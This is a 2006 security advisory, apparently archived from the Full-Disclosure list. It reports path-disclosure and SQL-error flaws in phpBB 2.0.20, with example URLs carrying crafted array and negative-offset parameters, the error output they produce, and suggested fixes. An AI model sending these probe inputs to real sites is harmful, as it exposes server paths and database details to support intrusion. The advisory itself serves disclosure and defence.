Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12557
HistoryMay 06, 2006 - 12:00 a.m.

[Full-disclosure] phpBB 2.0.20 Full Path Disclosure and SQL Errors

2006-05-0600:00:00
vulners.com
39
JSON

Source: http://securityreason.com/achievement_securityalert/38

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[phpBB 2.0.20 Full Path Disclosure and SQL Errors]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:

  • -Written: 1.5.2006
  • -Public: 5.5.2006

from SecurityReason.Com
CVE:

    • CVE-2006-2219 Full Path Disclosure
    • CVE-2006-2220 Sql Errors

  • — 0.Description —
    phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB
    has a

user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the
powerful PHP

server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the
ideal

free community solution for all web sites.
Contact with author http://www.phpbb.com/about.php.

  • — 1. Full Path Disclosure —
    Many scripts, for example phpBB, have a basic bug. It exists in variables, which are being inserted into
    script, into specific functions. For example function htmlspecialchars()


if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|ls", &str, &str_len, &quote_style,
&hint_charset, &hint_charset_len) == FAILURE) {
return;
}

As you can see there is a protection from formatting input variable. If the variable is other than string,
we have error with Full Path Disclosure.

Example:

http://[HOST]/2020/phpBB2/memberlist.php?mode[]=cx

  • —Code —
    if ( isset($HTTP_GET_VARS['mode']) || isset($HTTP_POST_VARS['mode']) )
    {
    $mode = ( isset($HTTP_POST_VARS['mode']) ) ? htmlspecialchars($HTTP_POST_VARS['mode']) :
    htmlspecialchars($HTTP_GET_VARS['mode']);
    }
    else
    {
    $mode = 'joined';
    }

  • —Code —

  • —Result —
    Warning: htmlspecialchars() expects parameter 1 to be string, array given in /www/2020/phpBB2/memberlist.php
    on line 40

Warning: Cannot modify header information - headers already sent by (output started at
/www/2020/phpBB2/memberlist.php:40) in /www/2020/phpBB2/includes/page_header.php on line 483

Warning: Cannot modify header information - headers already sent by (output started at
/www/2020/phpBB2/memberlist.php:40) in /www/2020/phpBB2/includes/page_header.php on line 485

Warning: Cannot modify header information - headers already sent by (output started at
/www/2020/phpBB2/memberlist.php:40) in /www/2020/phpBB2/includes/page_header.php on line 486

  • —Result —

http://[HOST]/2020/phpBB2/viewtopic.php?t=2&highlight[]=cx

  • —Result —
    Warning: htmlspecialchars() expects parameter 1 to be string, array given in /www/2020/phpBB2/viewtopic.php
    on line 487

Warning: urlencode() expects parameter 1 to be string, array given in /www/2020/phpBB2/viewtopic.php on line
498

Warning: Cannot modify header information - headers already sent by (output started at
/www/2020/phpBB2/viewtopic.php:487) in /www/2020/phpBB2/includes/page_header.php on line 483

Warning: Cannot modify header information - headers already sent by (output started at
/www/2020/phpBB2/viewtopic.php:487) in /www/2020/phpBB2/includes/page_header.php on line 485

Warning: Cannot modify header information - headers already sent by (output started at
/www/2020/phpBB2/viewtopic.php:487) in /www/2020/phpBB2/includes/page_header.php on line 486

  • —Result —

Problem appears if display_errors==1, but it exists on many websites. (even at php.net).

  • — 2. Sql Errors —

Problem appears because we can add everything (INT) to the end of SQL query (LIMIT). The query will fail if
the value is below 0 or above -2^32.

Example:

http://[HOST]/2020/phpBB2/memberlist.php?start=-1

  • —Code —
    $start = ( isset($HTTP_GET_VARS['start']) ) ? intval($HTTP_GET_VARS['start']) : 0;

  • —Code —

  • —Result —
    Could not query users

DEBUG MODE

SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL
server version for the right syntax to use near '-1, 50' at line 4

SELECT username, user_id, user_viewemail, user_posts, user_regdate, user_from, user_website, user_email,
user_icq, user_aim, user_yim, user_msnm, user_avatar, user_avatar_type, user_allowavatar FROM phpbb_users
WHERE user_id <> -1 ORDER BY user_regdate ASC LIMIT -1, 50

Line : 151
File : memberlist.php

  • —Result —

  • — 3. How to fix —
    Turn off display_errors or use function like is_string().

  • — 4. Greets —
    sp3x

Infospec, p_e_a, krasza, revival, l5x

iD8DBQFEW4pi3Ke13X/fTO4RAqV7AJ9PeZ9nbRUYATqArEzLOdenG1ypHwCguPa5
7DlqP3M3vq1frb7Zc3y+KrU=
=4U6Y
-----END PGP SIGNATURE-----

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Related

securityvulns 1
cve 2
ubuntucve 2
prion 2
securityvulns
securityvulns
Daily web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2006-05-06 00:00:00
cve
cve
CVE-2006-2220
2007-02-08 17:28:00
CVE-2006-2219
2007-02-08 17:28:00
ubuntucve
ubuntucve
CVE-2006-2220
2007-02-08 00:00:00
CVE-2006-2219
2007-02-08 00:00:00
prion
prion
Sql injection
2007-02-08 17:28:00
Design/Logic Flaw
2007-02-08 17:28:00
JSON
Related for SECURITYVULNS:DOC:12557
securityvulns1cve2ubuntucve2prion2